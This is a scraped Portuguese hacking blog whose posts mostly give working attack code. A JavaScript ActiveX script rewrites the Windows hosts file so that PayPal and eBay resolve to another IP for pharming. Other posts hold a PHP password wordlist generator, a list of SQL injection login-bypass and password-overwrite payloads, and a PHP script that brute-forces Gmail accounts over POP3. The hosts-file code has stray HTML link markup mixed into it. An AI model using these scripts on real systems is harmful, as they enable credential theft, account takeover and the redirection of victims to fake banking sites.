Silici0 :: Blog

Mas o que é pharming ? É a idéia de alterar, sequestrar ou mesmo contaminar o DNS da vítima para levar a vítima a um site falso, por traz disso, roubar dados pessoais, cartões de crédito, dados de banco e dentre outros (vai da imaginação de cada um), pode-se tambem criar um ponte através do de um site para o site desejado e monitorar os dados do trafego assim roubando as informações; mas porque estou falando disso aqui?! É pelo motivo que isso é feito ou pode ser feito através de sites mau intensionados com um simples código JavaScript, essa é a maneira mais utilizada.

Bom na verdade quando você digitar localhost no seu navegador ele irá procurar por este ip, caso não encontre ele vai tentando diversas combinações com www e .com e diversos outros.

O script abaixo mostra um exemplo de como podemos alterar o arquivo com Active-X no JavaScript, claro que o script ira pedir uma autorização, coisa que os hackers resolvem e você é afetado sem perceber. O que ele irá fazer é redirecionar o dominio digitado para o IP desejado.

JAVASCRIPT:

function pharmer(){
var fso = new ActiveXObject("Scripting.FileSystemObject");
var pharm = fso.CreateTextFile("C:\\WINDOWS\\system32\\Drivers\\etc\\hosts", true);
pharm.WriteLine('127.0.0.1� � � � � � localhost');
pharm.WriteLine('188.222.33.1� � � <a href="https://www.paypal.com/row/mrb/pal=2VAJ7L6XR6XWG" class="alinks_links" onclick="return alinks_click(this);" title="Transfer�ncia de dinheiro? BrPay Americano" style="padding-right: 13px; background: url(http://rafaelcunha.com/WordPress/wp-content/plugins/alinks/images/external.png) center right no-repeat;" rel="external">paypal</a>');
pharm.WriteLine('188.222.33.1� � � www.paypal.com');
pharm.WriteLine('188.222.33.1� � � ebay.com');
pharm.WriteLine('188.222.33.1� � � www.ebay.com');
pharm.Close();
}

Vulnerabilidades, segurança e outros

Levando a sério o negócio, é difícil encontrar blogs sobre vulnerabilidades, segurança, servidores e outros assuntos do genero, pelo menos blogs que levem a sério a informação, é essa a proposta do blog da NetAdviser, empresa especializada no assunto... trazendo um pouco mais de cultura de servidores, open source, linux e muito mais... como conheço-o pessoalmente estou apostando que logo logo será um blog de nome, cheio de informação válida para todos...

Ja começou bem tendo até trackbacks do br-linux, chega á hora do meu trackback, espero que role uns assuntos h4ck3r3s para nós se divertimos e aprendermos.

WordList em PHP para cracks

Bom, pensando no script para brutal Force no gmail que postei fiquei pensando; como podemos gerar uma lista de palavras para que possamos testar o script ? Existem diversas wordlist generator por ae, porém precisamos uma em php que construa e teste; gerar um arquivo TXT é uma lastima, pois fica gigantesto, então nada de pegar pronto, o negocio é gerar na mão.
Mas o que é esse tal de wordlist então ?
Nós podemos chamar de dicionário de palavras, nesta lista terá as palavras inimaginarias e imaginarias para que ao tentar crackear uma conta teste cada palavra como senha, o ideal para está lista seria ter todos as possíveis palavras.

Para que possamos testar 1 a 1 e ter certeza que iremos conseguir, mas todas as possibilidades é algo muito grandioso, por isso existem os dicionários de palavras ja prontos, como nosso amigo disponibiliza aqui.

Primeiro vamos definir em uma array todos os caracteres que iremos disponibilizar para teste:

PHP:

$alfa=array("A", "B", "C", "D", "F", "G", "H", "I", "K", "L", "M", "N", "O", "Q", "R", "S", "T", "V", "X", "Y", "Z");
foreach($alfa as $valor){
$passlist[]=strtoupper($valor);
}
foreach($alfa as $valor){
$passlist[]=strtolower($valor);
}
for($i=0;$i<10;$i++){
$passlist[]=$i;
}
$passlist[] = '$';
$passlist[] = '%';
$passlist[] = '&';
$passlist[] = '*';
$passlist[] = '#';

Então como podemos gerar todas as possíveis ~~senhas~~ palavras para 6 caracteres?

PHP:

foreach($passlist as $va0){
foreach($passlist as $va1){
foreach($passlist as $va2){
foreach($passlist as $va3){
foreach($passlist as $va4){
foreach($passlist as $va5){
foreach($passlist as $va6){
echo $va0.$va1.$va2.$va3.$va4.$va5.$va6;
}
}
}
}
}
}
}

SQL Injection Hacks no PHP

Continuando a diversão de se fazer testes no seu sistema ou se divertir com sistemas de outros segue uma lista de possíveis SQL injections, lembrando que pode-se utilizar tanto no login/senha no form ou como na url quando se utilizam método de $_GET no php, vamos lá:

HTML:

user:admin
pass:' or 1=1--
user:' or 1=1--
admin:' or 1=1--
password:' or 1=1--
admin:' or a=a--
admin:' or 1=1--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1 OR 1=1
1' OR '1'='1
1'1
1 EXEC SP_ (or EXEC XP_)
1 AND 1=1
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
" AND user like %name% --
"; select user like %name% --
"; update users set passw = 'newpass' where user like %name% --

Existem diversas outras formas de se fazer ataques e fazer antes pesquisas de versões, match, vetores, mapiamento do mysql e até mesmo com user do mysql interno. Mas por hoje fica a lista por aqui, lembrando que fica por sua conta e risco, isso é somente um informativo...

HACK descobrindo senhas de e-mail

Abrirei uma nova sessão de hacks, não afim de que meus leitores ownem (?) o mundo, mas sim para aprender os hacks de php afim de bolar soluções para se proteger contra isso. Vou começar com um hack para descobrir senhas utilizando BrutalForce no PHP através do POP3 dos emails, não irei explicar o que significa os jargões e como obter informações, sim somente uma demonstração de um código que foi disponibilizado pela Webzine do 0x000000.

Feito o script para o gmail, afim de que vejam que o nome do usuário é o email e por isso ja temos 50% de chance a mais para o hack. O script consegue ser rodado para qualquer tipo de POP3 baseado em SSL, como hotmail e muitos outros pela net.

PHP:

error_reporting(0);
ini_set("max_execution_time",0);
function bruteforce($email) {
$passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');
$start� � � � = 0;
while($forced == false && $start <= count($passlist)) {
usleep(1000000);
$ssl = fsockopen("ssl://pop.gmail.com", 995, $err, $errdata, 40);
if (!$ssl) {
echo "$errdata" . " => " . "$err";
} else {
$auth = fgets($ssl, 128);
fputs($ssl, "USER ".$email."\n");
$auth = fgets($ssl, 128);
fputs($ssl, "PASS ".$passlist[$start]."\n");
$auth = fgets($ssl, 128);
$status = substr($auth, 0, 4);
if($status == "+OK ") {
$forced = true;
}
if($status == "-ERR") {
$forced = false;
$start++;
}
fclose ($ssl);
if($forced) {
echo "
<div style='background-color:lime;font-size:16px;'>Password found: $passlist[$start]</div>
";
}
}
}
return $forced;
}
bruteforce("bazookajoe@gmail.com");